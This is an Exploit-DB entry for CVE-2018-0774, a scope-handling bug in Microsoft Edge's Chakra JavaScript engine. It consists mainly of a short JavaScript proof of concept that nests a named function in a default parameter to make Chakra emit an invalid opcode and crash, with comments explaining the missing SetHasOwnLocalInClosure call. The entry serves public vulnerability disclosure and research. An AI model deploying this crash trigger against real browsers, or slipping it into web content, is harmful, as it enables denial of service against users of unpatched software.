Microsoft Edge Chakra - Incorrect Scope Handling

2018-01-17T00:00:00
ID EDB-ID:43715
Type exploitdb
Reporter Exploit-DB
Modified 2018-01-17T00:00:00

Description

Microsoft Edge Chakra - Incorrect Scope Handling. CVE-2018-0774. Dos exploit for Windows platform

                                        
                                            // PoC:

(function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {

    }
})();

// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.